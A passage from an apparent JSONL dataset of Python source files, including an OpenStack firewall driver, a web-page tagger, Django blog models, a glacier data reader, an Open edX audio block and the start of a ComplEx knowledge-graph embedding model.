def _set_firewall_status(self, context, fw):\n if self._is_firewall_enabled(fw):\n status = consts.ACTIVE\n else:\n status = consts.INACTIVE\n self.plugin.set_firewall_status(context, fw['id'], status)\n\n def _is_firewall_enabled(self, fw):\n return fw['firewall_policy_id'] and fw['admin_state_up']\n\n def _add_task(self, context, action, fw_id, params, router_id=None):\n l3_driver = self._varmour_l3_driver\n l3_provider = self._varmour_l3_provider\n if not l3_driver:\n return\n\n fw = self.plugin._get_firewall(context, fw_id)\n if router_id:\n r = self._l3_plugin._get_router(context, router_id)\n l3_driver._add_task(action, r, params=params)\n else:\n routers = self._l3_plugin.get_routers(context)\n for r in routers:\n # only apply to varmour routers\n if (r.get('provider') == l3_provider and\n r['tenant_id'] == fw['tenant_id']):\n l3_driver._add_task(action, r, 
params=params)\n\n    def create_router(self, context, router_id):\n        for fw in self.plugin.get_firewalls_for_driver(context, self):\n            fw_dict = self.plugin.make_firewall_dict_with_rules(context,\n                                                                fw['id'])\n            self._add_task(context, va_consts.ACT_CREATE_FIREWALL, fw['id'],\n                           {'fw_id': fw['id'],\n                            'rules': fw_dict['firewall_rule_list']},\n                           router_id=router_id)\n\n    def delete_router(self, context, router_id):\n        for fw in self.plugin.get_firewalls_for_driver(context, self):\n            self._add_task(context, va_consts.ACT_DELETE_FIREWALL, fw['id'],\n                           {'fw_id': fw['id']},\n                           router_id=router_id)\n\n    def _create_firewall(self, context, fw):\n        fw_dict = self.plugin._make_firewall_dict_with_rules(context,\n                                                             fw['id'])\n        self._add_task(context, va_consts.ACT_CREATE_FIREWALL, fw['id'],\n                       {'fw_id': fw['id'],\n                        'rules': fw_dict['firewall_rule_list']})\n\n    def create_firewall(self, context, fw):\n        if self._is_firewall_enabled(fw):\n            self._create_firewall(context, fw)\n\n        self._set_firewall_status(context, fw)\n\n    def _delete_firewall(self, context, old_fw):\n        self._add_task(context,\n                       va_consts.ACT_DELETE_FIREWALL, old_fw['id'],\n                       {'fw_id': old_fw['id']})\n\n    def delete_firewall(self, context, old_fw):\n        if self._is_firewall_enabled(old_fw):\n            self._delete_firewall(context, old_fw)\n\n        self.plugin.firewall_deleted(context, old_fw['id'])\n\n    def update_firewall(self, context, old_fw, fw):\n        old_enabled = self._is_firewall_enabled(old_fw)\n        enabled = self._is_firewall_enabled(fw)\n\n        if old_enabled and not enabled:\n            self._delete_firewall(context, old_fw)\n        elif not old_enabled and enabled:\n            self._create_firewall(context, fw)\n        elif (old_enabled and enabled and\n              old_fw['firewall_policy_id'] != fw['firewall_policy_id']):\n            self._delete_firewall(context, old_fw)\n            self._create_firewall(context, fw)\n\n        self._set_firewall_status(context, fw)\n\n    def update_firewall_policy(self, context, old_fwp, fwp, fw_list):\n        same = True\n        if len(fwp['firewall_rules']) == len(old_fwp['firewall_rules']):\n            for idx, rid in enumerate(fwp['firewall_rules']):\n                if old_fwp['firewall_rules'][idx] != rid:\n                    same = False\n                    break\n        else:\n            same = False\n\n        for fw_id in fw_list:\n            if not same:\n                fw = self.plugin.get_firewall(context, fw_id)\n                if self._is_firewall_enabled(fw):\n                    self._delete_firewall(context, fw)\n                    self._create_firewall(context, fw)\n                self._set_firewall_status(context, fw)\n            else:\n                fw = self.plugin._get_firewall(context, fw_id)\n                self._set_firewall_status(context, fw)\n\n    def update_firewall_rule(self, context, fwp, fwr, fw_list):\n        for fw_id in fw_list:\n            self._add_task(context, va_consts.ACT_MODIFY_FIREWALL_RULE, fw_id,\n                           {'rule': fwr})\n            fw = self.plugin._get_firewall(context, fw_id)\n            self._set_firewall_status(context, fw)\n\n    def insert_rule(self, context, fwp, fwr, before, ref_fwr_id, fw_list):\n        for fw_id in fw_list:\n            self._add_task(context, va_consts.ACT_INSERT_FIREWALL_RULE, fw_id,\n                           {'rule': fwr,\n                            'before': before,\n                            'refer': ref_fwr_id})\n            fw = self.plugin._get_firewall(context, fw_id)\n            self._set_firewall_status(context, fw)\n\n    def remove_rule(self, context, fwp, fwr, fw_list):\n        for fw_id in fw_list:\n            self._add_task(context, va_consts.ACT_DELETE_FIREWALL_RULE, fw_id,\n                           {'rule': fwr})\n            fw = self.plugin._get_firewall(context, fw_id)\n            self._set_firewall_status(context, fw)\n","sub_path":"neutron/plugins/varmour/varmour_fw_driver.py","file_name":"varmour_fw_driver.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"551622002","text":"from dvc.command.common.base import CmdBase\nfrom dvc.git_wrapper import GitWrapper\n\n\nclass CmdShowWorkflow(CmdBase):\n def run(self):\n target = self.args.target\n if not target:\n target = self.project.config._config['Global'].get('Target', '')\n self.project.logger.debug(u'Set show workflow target as {}'.format(target))\n\n wf = GitWrapper.get_all_commits(target, self.settings)\n wf.build_graph(self.args.dvc_commits,\n self.args.all_commits,\n self.args.max_commits)\n return 0\n","sub_path":"dvc/command/show_workflow.py","file_name":"show_workflow.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"318412063","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 18 12:37:48 2015\n\n@author: sindreno\n\"\"\"\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as Canvas\nfrom matplotlib.figure import Figure\n\nclass MatplotlibWidget(Canvas): \n def __init__(self, parent=None, title='Title', xlabel='Stretch', ylabel='Stress', dpi=100, hold=False):\n super(MatplotlibWidget, self).__init__(Figure())\n self.setParent(parent)\n self.figure = Figure(dpi=dpi)\n self.canvas = Canvas(self.figure)\n\n self.figure.patch.set_facecolor('0.2')\n\n self.theplot = self.figure.add_subplot(111, axisbg='0.3')\n self.theplot.patch.set_facecolor('0.3')\n\n self.theplot.set_title(title)\n self.theplot.set_xlabel(xlabel)\n self.theplot.xaxis.label.set_color('red')\n self.theplot.set_ylabel(ylabel)\n self.theplot.yaxis.label.set_color('red')\n\n self.theplot.spines['bottom'].set_color('red')\n self.theplot.spines['left'].set_color('red')\n\n self.theplot.tick_params(axis='x', colors='red')\n self.theplot.tick_params(axis='y', colors='red')\n\n \n def plotDataPoints(self, x, y):\n self.theplot.plot(x,y)\n self.draw() ","sub_path":"Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"211722295","text":"import string\nimport os\nimport re\nimport joblib\n\nimport pandas as pd \nimport numpy as np\n\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef test_webscraper_function(url):\n import selenium\n import bs4\n from bs4 import BeautifulSoup\n from selenium import webdriver\n\n # Getting Pages\n driver = webdriver.Chrome('project_high/Model/chromedriver.exe')\n driver.get(url)\n res = driver.execute_script(\"return document.documentElement.outerHTML\")\n driver.quit()\n\n # Parse Page\n soup = BeautifulSoup(res, 'lxml')\n\n # Text\n para = soup.findAll('p')\n text = ''\n for p in para:\n text = text + ' ' + p.getText()\n # text = text_processor(text)\n\n try:\n name = soup.find('h1').getText()\n except:\n name = 'None'\n\n return text, name\n\ndef clean_text(text):\n text = re.sub(\"\\'\", \"\", text) \n text = re.sub(\"[^a-zA-Z]\",\" \",text) \n text = ' '.join(text.split()) \n text = text.lower() \n\n ps = PorterStemmer()\n _t = \"\"\n for t in text.split():\n _t += ps.stem(t) + \" \"\n text = _t\n\n stop_words = set(stopwords.words('english'))\n no_stopword_text = [w for w in text.split() if not w in stop_words]\n clean_text = ' '.join(no_stopword_text)\n\n # return text\n return clean_text\n\ndef text_return_tags(text, title):\n # clean text\n cleaned_text = clean_text(text)\n\n # corpus load 
as model_data.csv\n corpora_data = pd.read_csv('project_high/Model/model-data.csv')\n\n # tfidf vectorizer on corpus\n tfidf_vect = TfidfVectorizer(max_df=0.8, max_features=1000)\n tfidf_vect.fit_transform(corpora_data['Text'])\n \n # tfidf transform on new text\n text_ft = tfidf_vect.transform([cleaned_text])\n\n # load features\n ml_features = []\n ml_features_models = []\n for file in os.scandir(path='project_high/Model/model_pickle_files'):\n ml_features.append(file.name[:-4]) \n ml_features_models.append(joblib.load('project_high/Model/model_pickle_files/' + file.name))\n\n # predict tags\n tag_list = []\n ps = PorterStemmer()\n _t = \"\"\n for t in title.split():\n _t += ps.stem(t) + \" \"\n title = _t\n for model_index in range(0, len(ml_features_models)):\n if ml_features[model_index] in title:\n if ml_features[model_index] in title or ps.stem(ml_features[model_index]) in title:\n continue\n else:\n tag_list.append(ml_features[model_index])\n else:\n y_pred = ml_features_models[model_index].predict(text_ft)\n if y_pred == 1:\n tag_list.append(ml_features[model_index])\n\n # suggest extra\n # --option for extra tags available\n # --multiprocessing\n\n # return tags\n return tag_list\n\ntext, title = test_webscraper_function('https://uxdesign.cc/make-sense-of-rounded-corners-on-buttons-dfc8e13ea7f7')\nprint(text_return_tags(text, title))","sub_path":"project_high/Model/refer.py","file_name":"refer.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"476089162","text":"import mechanicalsoup\nimport random\nimport webbrowser\nimport time\nfrom os import system\n#system(\"title \"+\"Sick_Yt_Random_Things_Player\")\n\nbr=mechanicalsoup.StatefulBrowser()\n\nwhile True:\n\tlinks = []\n\tterm = str(input(\"Search for \"))\n\tterm.replace(' ','+')\n\tbr.open(\"https://www.youtube.com/results?search_query=\"+term)\n\tresp = br.get_current_page()\n\tcount = 0\n\t#print(resp.text)\n\tprint(\"What I've found:\")\n\t#print(resp.text)\n\tfor link in resp.findAll('a',attrs={\"dir\" : \"ltr\"}, href=True ):\n\t\tif(link[\"href\"].split('?')[0] == \"/watch\" and count <= 10):\n\t\t\tcount+=1\n\t\t\tlinks.append((link.text,link[\"href\"]))\n\t\t\tprint(\"{0}.{1}\".format(count,link.text))\n\tif(len(links) != 0):\n\t\t#l = random.choice(links)\n\t\tl = int(input(\"Choose ur beat:\"))\n\t\t#print(\"How about: {0}? 
(y/n)\".format(links[l][0]))\n\t\t#if(input(\"-> \") == 'y'):\n\t\tprint(\"Playin ' {0}\".format(links[l][0]))\n\t\tgohere = \"https://www.youtube.com\"+str(links[l][1])\n\t\t#print(gohere)\n\t\ttime.sleep(2)\n\t\twebbrowser.open(gohere)\n\t\ttime.sleep(1)\n\telse:\n\t\tprint(\"I'm a shitty ass program and for some god forsaken reason can't load this shit\")\n\t\t#br.refresh()\n\t\t#print(br.get_current_page().prettify())\n","sub_path":"random_yt_link2.py","file_name":"random_yt_link2.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"482419070","text":"import csv\n\ndef main():\n product_dictionary = get_product_dict()\n print(product_dictionary)\n\ndef get_product_dict():\n \n product_dict = {}\n\n with open('products.csv') as products_csv:\n read_products = csv.reader(products_csv)\n next(read_products)\n\n for row in read_products:\n product_info = []\n product_num = row[0]\n product_name = row[1]\n product_info.append(product_name)\n product_price = row[2]\n product_info.append(product_price)\n\n product_dict[product_num] = product_info\n\n\n return product_dict\n\nmain()\n","sub_path":"prove milestone/receipt.py","file_name":"receipt.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"228158719","text":"import json\nimport mysql.connector\n\ndb_connection = mysql.connector.connect(\n host=\"mysql_container\",\n user=\"dev\",\n passwd=\"123456\",\n database=\"devopstt\"\n)\ndb_cursor = db_connection.cursor(dictionary=True)\n\ndef test_version():\n db_cursor.execute(\"SELECT max(version) as version FROM versionTable;\")\n resultVersion = db_cursor.fetchone()\n f = open('expecteddbstate/versionTable.json')\n version = json.load(f)\n assert resultVersion == version\n\ndef test_appTable():\n db_cursor.execute(f\"SELECT * FROM appTable;\")\n result = db_cursor.fetchone()\n fileoutput = open(\"expecteddbstate/appTable.json\")\n test = json.load(fileoutput)\n assert result == test\n\ndef test_someTable():\n db_cursor.execute(f\"SELECT * FROM someTable;\")\n result = db_cursor.fetchone()\n fileoutput = open(\"expecteddbstate/someTable.json\")\n test = json.load(fileoutput)\n assert result == test\n ","sub_path":"test/db_test.py","file_name":"db_test.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"574528154","text":"import csv\nimport os\nimport numpy as np\nimport copy\nimport pickle\nfrom utils import read_csv, write_csv, hashing\nfrom operator import itemgetter\nfrom datetime import datetime, timedelta\nimport pdb\n\n\n'''\nHEADER = ['LOS', 'age_at_admission', 'CHF', 'Arrhy', 'VALVE', 'PULMCIRC',\n 'PERIVASC', 'HTN', 'PARA', 'NEURO', 'CHRNLUNG', 'DM', 'HYPOTHY',\n 'RENLFAIL', 'LIVER', 'ULCER', 'AIDS', 'LYMPH', 'METS', 'TUMOR',\n 'ARTH', 'COAG', 'OBESE', 'WGHTLOSS', 'LYTES', 'BLDLOSS', 'ANEMDEF',\n 'ALCOHOL', 'DRUG', 'PSYCH', 'DEPRESS']\n'''\nHEADER = ['age_at_admission', 'CHF', 'Arrhy', 'VALVE', 'PULMCIRC',\n 'PERIVASC', 'HTN', 'PARA', 'NEURO', 'CHRNLUNG', 'DM', 'HYPOTHY',\n 'RENLFAIL', 'LIVER', 'ULCER', 'AIDS', 'LYMPH', 'METS', 'TUMOR',\n 'ARTH', 'COAG', 'OBESE', 'WGHTLOSS', 'LYTES', 'BLDLOSS', 'ANEMDEF',\n 'ALCOHOL', 'DRUG', 'PSYCH', 'DEPRESS'] # zero-one values\n\nADD_HEADER = ['TOS']\nSTR_HEADER = ['Gender', 'Race2', 'Insurance2'] \nSTR_HEADER_CLASS = [['F', 'M'], \n ['Non-WHITE', 'WHITE'],\n 
['Private', 'Public', 'Self']]\n# private: 1 0, public: 0 1, self: 0 0\n\ndir_path = './datasets'\ninput_root = './input_datasets'\ninput_fname = os.path.join(dir_path, '05_converter.pkl')\nicd_fname = os.path.join(input_root, 'icd_code.csv')\noutput_fname = os.path.join(dir_path, '06_feature_eng.pkl')\n\ndef _subset_extractor(records, header):\n subset = []\n for record in records:\n subset_ = {}\n for name in header:\n subset_[name] = record[name]\n subset.append(subset_)\n return subset\n\ndef main():\n icd_codes = read_csv(icd_fname)\n icd_codes = hashing(icd_codes, 'ICUSTAY_ID')\n\n with open(input_fname, 'rb') as fp:\n records = pickle.load(fp)\n\n mats = records['mats']\n labels = records['ys']\n\n xs = [] # static features\n ys = [] # case/control\n icustay_id = []\n for key, data in mats.items():\n avg = np.mean(data, axis=0)\n std = np.std(data, axis=0)\n max_val = np.max(data, axis=0)\n min_val = np.min(data, axis=0)\n\n icd_code = icd_codes[key]\n assert len(icd_code) == 1\n _icd_code = icd_code[0]\n icd_code = [_icd_code[name] for name in HEADER]\n icd_code += [str(data.shape[0])]\n for _i in range(len(STR_HEADER)-1):\n # only for gender and race\n c = STR_HEADER_CLASS[_i].index(_icd_code[STR_HEADER[_i]])\n icd_code.extend([str(c)])\n\n if _icd_code['Insurance2']=='Private':\n icd_code.extend(['1', '0'])\n elif _icd_code['Insurance2']=='Public':\n icd_code.extend(['0', '1'])\n else:\n icd_code.extend(['0', '0'])\n\n #feat = np.concatenate((avg, std, max_val, min_val, [float(icd_code[0])]))\n feat = np.concatenate((avg, std, max_val, min_val, icd_code))\n xs.append(np.expand_dims(feat, axis=0))\n\n if labels[key] == 'control':\n ys.append(0)\n elif labels[key] == 'case':\n ys.append(1)\n else:\n raise ValueError()\n \n icustay_id.append(key)\n\n cs = np.zeros(len(feat), dtype=int)\n cs[-(len(icd_code)-1):] = 1 # if its categorical (1) or not (0)\n xs = np.concatenate(xs, axis=0)\n ys = np.asarray(ys)\n\n print(xs.shape, ys.shape)\n data = {\n 'xs': xs,\n 'cs': cs,\n 'ys': ys,\n 'icustay_id': icustay_id,\n }\n print('ratio: %.4f'%(np.sum(ys==1) / len(ys)))\n print(xs[0], ys[0])\n print(xs[-1], ys[1])\n\n with open(output_fname, 'wb') as fp:\n pickle.dump(data, fp)\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/new_preprocessing/06_feature_eng.py","file_name":"06_feature_eng.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"119373094","text":"#export CUDA_VISIBLE_DEVICES=3\nimport os\n\nif os.path.exists('.local'):\n\tdata_dir = '/home/andrei/work/t7/splited/'\n\tbatch_size = 4\n\tnum_workers = 4\n\ttopk = 2\n\n\tSHOW_BAR = False\n\tDEBUG = True\n\tTOPk = 3\n\nelse:\n\t#data_dir = '/home/andrei/Data/Datasets/Scales/splited/'\n\tdata_dir = '/mnt/lin2/datasets/splited/'\t\n\tbatch_size = 32\n\tnum_workers = 8\t\n\n\tSHOW_BAR = True\n\tDEBUG = False\n\tTOPk = 6\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"174455645","text":"from django.db import models\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.translation import ugettext_noop\nfrom django.utils.translation import ugettext \n\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\n\n#-----------------------------------------------------------------\n# подписанные пользователи\nclass ReadUser(models.Model):\n class 
Meta:\n unique_together = (\"user\", \"signuser\")\n index_together = [\"user\", \"signuser\"]\n verbose_name = _('блог пользователя')\n verbose_name_plural = _('1. Блоги пользователей')\n\n user = models.CharField(\n max_length = 30, \n editable=False,\n help_text=_('формируется автоматически'),\n verbose_name=_('пользователь'),)\n signuser = models.ForeignKey(User, \n on_delete=models.CASCADE, \n verbose_name=_('подписанный пользователь'),)\n \n #---------------------------------------------\n def __str__(self):\n #a = self.user\n a = self.signuser.__str__() \n return (\n a\n #+ \", \" + b\n )\n\n\n#-----------------------------------------------------------------\n# посты в блоге\nclass BlogPost(models.Model):\n class Meta:\n index_together = [\"user\"]\n verbose_name = _('пост блога')\n verbose_name_plural = _('2. Посты блога')\n\n user = models.CharField(\n max_length = 30, \n #editable=False,\n help_text=_('формируется автоматически'),\n verbose_name=_('пользователь'),)\n header = models.TextField(\n verbose_name=_('заголовок_'),)\n content = models.TextField(\n verbose_name=_('содержание'),)\n qdate = models.DateTimeField(\n auto_now=True, \n verbose_name=_('дата создания'),)\n\n #---------------------------------------------\n def get_absolute_url(self):\n a = \"/post/%i/\" % self.id\n return a\n\n #---------------------------------------------\n def __str__(self):\n #a = self.user\n a = self.user\n b = self.header \n return (\n a\n + \", \" + b\n #+ \", \" + c\n )\n\n\n#-----------------------------------------------------------------\n# прочитанные посты\nclass ReadPost(models.Model):\n class Meta:\n unique_together = (\"user\", \"post\")\n index_together = [\"user\", \"post\"]\n verbose_name = _('Прочитанный пост')\n verbose_name_plural = _('3. Прочитанные посты')\n\n user = models.CharField(\n max_length = 30, \n editable=False,\n help_text=_('формируется автоматически'),\n verbose_name=_('пользователь'),)\n post = models.ForeignKey(BlogPost, \n on_delete=models.CASCADE, \n verbose_name=_('прочитанный пост'),)\n\n #---------------------------------------------\n def __str__(self):\n #a = self.user\n a = self.user\n b = self.post.__str__() \n return (\n a\n + \", \" + b\n #+ \", \" + c\n )\n\n\n","sub_path":"testblog/blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"71784814","text":" \ndef work(a):\n if(a<-20):\n print('Холодновато')\n elif(a in range(-19,1)):\n print('Не жарко')\n elif(a in range(0,21)):\n print('Сравнительно нормально')\n elif(a in range(25,31)):\n print('Жарковато')\n elif(a>30):\n print('На улице очень жарко')\n\n\ndef is_right(a):\n try:\n a = int(a)\n print(a)\n except ValueError:\n return False\n return a\n \ndef main():\n while True:\n a = input('Введите 1 число ')\n a = is_right(a)\n if(a is False): \n print('Введите корректное число ')\n continue\n work(a)\n asnwer = input(\"Продолжить? 
(да/нет) \")\n if(asnwer == 'нет'):\n break\nmain()","sub_path":"9/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"417816098","text":"'''\nCreated on 18.05.2018\n\n@author: yvo\n'''\n\nfrom dataflow.DataReaders.VawFileReaders import VawFileReader\nfrom dataflow.DataObjects.LengthChange import LengthChange\n\n\nclass LengthChangeReader(VawFileReader):\n '''\n Specific file reader for length change measurement files used by Andreas Bauder.\n \n Example of typical header line:\n ---\n # Length Change; Allalin; 11; 6.50\n # surv.date; m-code; ref.date; lc; clc; h_min; observer\n # dt:ddmmyyyy; ; dt:ddmmyyyy; (m); (m); (m asl);\n ---\n \n Attributes:\n - ___NUMBER_HEADER_LINES Number of header lines used in the length change file.\n '''\n\n ___NUMBER_HEADER_LINES = 3\n\n def __init__(self, fullFileName):\n '''\n Constructor of the class.\n \n @type fullFileName: string\n @param fullFileName: Absolute file path.\n '''\n \n super().__init__(fullFileName)\n \n # Setting the parameters of the data file.\n self._numberHeaderLines = self.___NUMBER_HEADER_LINES\n #self._headerLineContent[3] = \"Length change (can be ignored)\"\n \n def parse(self):\n '''\n Starts the parsing of the given file. The parser runs through the entire file\n and collects the individual length change measurements.\n Each line of a length change measurement will be converted into a \n DataObjects.LengthChange.LengthChange object.\n \n Only measurements which are measured, reconstructed or observed are included.\n \n The individual measurements are included into a list containing the entire \n time series of the length change measurement of the glacier as given in the file.\n \n @rtype: List of DataObjects.LengthChange.LengthChange objects\n @return: Entire time series of the length changes of the glacier.\n '''\n \n lengthChangeList = []\n \n with open(self._fullFileName, \"r\") as lc:\n\n lineCounter = 0\n\n for line in lc:\n\n lineCounter += 1\n \n try:\n \n if lineCounter > self._NUMBER_HEADER_LINES:\n data = self._getData(line)\n\n if data[4] == \"m\" or data[4] == \"r\" or data[4] == \"o\":\n\n lengthChange = LengthChange(None, \n data[0], data[1], \n data[2], data[3],\n data[4], \n data[5], \"\",\n data[6], \n data[7],\n \"\")\n \n lengthChangeList.append(lengthChange)\n \n self._glacier.addLengthChange(lengthChange)\n \n \n except Exception as e:\n\n errorMessage = \"{0} @ {1}: {2}\".format(lc, lineCounter, e)\n print(errorMessage)\n \n return lengthChangeList\n \n def _getData(self, dataLine):\n '''\n Helper function to retrieve all information of a single length change measurement line.\n \n Each parameter stored in the text file will be parsed and converted into an appropriate type.\n \n @type dataLine: string\n @param dataLine: Entire line with a measurement of the text file.\n \n @rtype: Array\n @return: Converted data of one length change measurement.\n '''\n \n dateToReformated = self._reformateDate(dataLine[:10])\n dateFromReformated = self._reformateDate(dataLine[16:26])\n dateTo = dateToReformated[0]\n dateToQuality = dateToReformated[1]\n dateFrom = dateFromReformated[0]\n dateFromQuality = dateFromReformated[1]\n \n measurementType = dataLine[12:13]\n \n variationQuantitative = float(dataLine[26:37].strip())\n \n elevationMin = \"\"\n elevationMinTemp = dataLine[42:54].strip()\n if elevationMinTemp != \"NaN\":\n try:\n elevationMin = float(elevationMinTemp)\n except:\n elevationMin = 
\"\"\n \n observer = \"\"\n observerTemp = dataLine[54:].strip()\n if observerTemp != \"-\":\n observer = observerTemp\n \n return [dateFrom, dateFromQuality, dateTo, dateToQuality, measurementType, variationQuantitative, elevationMin, observer]","sub_path":"dataflow/DataReaders/VawFileReaders/LengthChangeReader.py","file_name":"LengthChangeReader.py","file_ext":"py","file_size_in_byte":4651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331691148","text":"from itertools import zip_longest\nfrom typing import Iterable\n\nimport colorama\n\n\ndef diffprint(x, y):\n \"\"\"Print elements or lists x and y, with differences in red\"\"\"\n\n def _diffprint(x, y):\n if x != y:\n print(colorama.Fore.RED, x, y, colorama.Fore.RESET)\n else:\n print(x, y)\n\n if isinstance(x, Iterable):\n for xe, ye in zip_longest(x, y):\n _diffprint(xe, ye)\n else:\n _diffprint(x, y)\n\n\ndef unzip(l):\n return zip(*l)\n","sub_path":"qurator/dinglehopper/tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331244210","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom xblock.core import XBlock\nfrom xblock.fragment import Fragment\nfrom xblockutils.studio_editable import StudioEditableXBlockMixin\nfrom xblockutils.resources import ResourceLoader\n\nfrom .fields import AudioFields\nfrom .utils import get_path_mimetype\n\n\nlog = logging.getLogger(__name__)\nloader = ResourceLoader(__name__)\n\n\n@XBlock.needs('i18n')\nclass AudioBlock(AudioFields, StudioEditableXBlockMixin, XBlock):\n # Styling and asset controls.\n icon_class = 'audio'\n js_module_name = \"Audio\"\n\n editable_fields = ('sources', 'allow_audio_download')\n\n\n def student_view(self, context):\n \"\"\"\n Player view, displayed to the student\n \"\"\"\n\n sources = filter(None, self.sources.split('\\n')) if self.sources else ''\n audio_download_url = sources[0] if sources else None\n\n # Add the MIME type if we think we know it.\n annotated_sources = []\n for source in sources:\n type = get_path_mimetype(source)\n\n annotated_sources.append((source, type))\n\n fragment = Fragment()\n fragment.add_content(loader.render_mako_template(\n 'templates/html/audio.html', {\n 'audio_id': self.audio_id,\n 'sources': annotated_sources,\n 'allow_audio_download': self.allow_audio_download,\n 'audio_download_url': audio_download_url\n }))\n fragment.add_css_url(self.runtime.local_resource_url(self, 'public/css/audio.css'))\n fragment.add_css_url(self.runtime.local_resource_url(self, 'public/css/mediaelement.player.min.css'))\n fragment.add_javascript_url(self.runtime.local_resource_url(self, 'public/js/mediaelement.player.min.js'))\n fragment.add_javascript_url(self.runtime.local_resource_url(self, 'public/js/audio.js'))\n fragment.initialize_js(\"AudioBlock\")\n\n return fragment\n","sub_path":"audio/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3526641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom pykg2vec.core.KGMeta import ModelMeta\n\n\nclass Complex(ModelMeta):\n \"\"\"\n ------------------Paper Title-----------------------------\n Complex Embeddings for Simple Link Prediction\n 
------------------Paper Authors---------------------------\n    Théo Trouillon (1,2) THEO.TROUILLON@XRCE.XEROX.COM\n    Johannes Welbl (3) J.WELBL@CS.UCL.AC.UK\n    Sebastian Riedel (3) S.RIEDEL@CS.UCL.AC.UK\n    Éric Gaussier (2) ERIC.GAUSSIER@IMAG.FR\n    Guillaume Bouchard (3) G.BOUCHARD@CS.UCL.AC.UK\n    (1) Xerox Research Centre Europe, 6 chemin de Maupertuis, 38240 Meylan, FRANCE\n    (2) Université Grenoble Alpes, 621 avenue Centrale, 38400 Saint Martin d’Hères, FRANCE\n    (3) University College London, Gower St, London WC1E 6BT, UNITED KINGDOM\n    ------------------Summary---------------------------------\n    ComplEx is an enhanced version of DistMult in that it uses complex-valued embeddings\n    to represent both entities and relations. Using the complex-valued embeddings allows\n    the scoring function defined in ComplEx to differentiate facts with asymmetric relations.\n    \"\"\"\n\n    def __init__(self, config=None):\n        self.config = config\n        self.data_stats = self.config.kg_meta\n        self.tot_ent = self.data_stats.tot_entity\n        self.tot_rel = self.data_stats.tot_relation\n        self.model_name = 'Complex'\n\n    def def_inputs(self):\n        self.h = tf.placeholder(tf.int32, [None])\n        self.r = tf.placeholder(tf.int32, [None])\n        self.t = tf.placeholder(tf.int32, [None])\n        self.hr_t = tf.placeholder(tf.float32, [None, self.data_stats.tot_entity])\n        self.rt_h = tf.placeholder(tf.float32, [None, self.data_stats.tot_entity])\n\n        self.test_h_batch = tf.placeholder(tf.int32, [None])\n        self.test_r_batch = tf.placeholder(tf.int32, [None])\n        self.test_t_batch = tf.placeholder(tf.int32, [None])\n\n    def def_parameters(self):\n        k = self.config.hidden_size\n        with tf.name_scope(\"embedding\"):\n            self.emb_e_real = tf.get_variable(name=\"emb_e_real\", shape=[self.tot_ent, k],\n                                              initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n            self.emb_e_img = tf.get_variable(name=\"emb_e_img\", shape=[self.tot_ent, k],\n                                             initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n            self.emb_rel_real = tf.get_variable(name=\"emb_rel_real\", shape=[self.tot_rel, k],\n                                                initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n            self.emb_rel_img = tf.get_variable(name=\"emb_rel_img\", shape=[self.tot_rel, k],\n                                               initializer=tf.contrib.layers.xavier_initializer(uniform=False))\n\n        self.parameter_list = [self.emb_e_real, self.emb_e_img, self.emb_rel_real, self.emb_rel_img]\n\n    def def_loss(self):\n        h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = self.embed(self.h, self.r, self.t)\n\n        h_emb_real, r_emb_real, t_emb_real = self.layer(h_emb_real, r_emb_real, t_emb_real)\n        h_emb_img, r_emb_img, t_emb_img = self.layer(h_emb_img, r_emb_img, t_emb_img)\n\n        h_emb_real = tf.squeeze(h_emb_real)\n        r_emb_real = tf.squeeze(r_emb_real)\n        t_emb_real = tf.squeeze(t_emb_real)\n        h_emb_img = tf.squeeze(h_emb_img)\n        r_emb_img = tf.squeeze(r_emb_img)\n        t_emb_img = tf.squeeze(t_emb_img)\n\n        realrealreal = 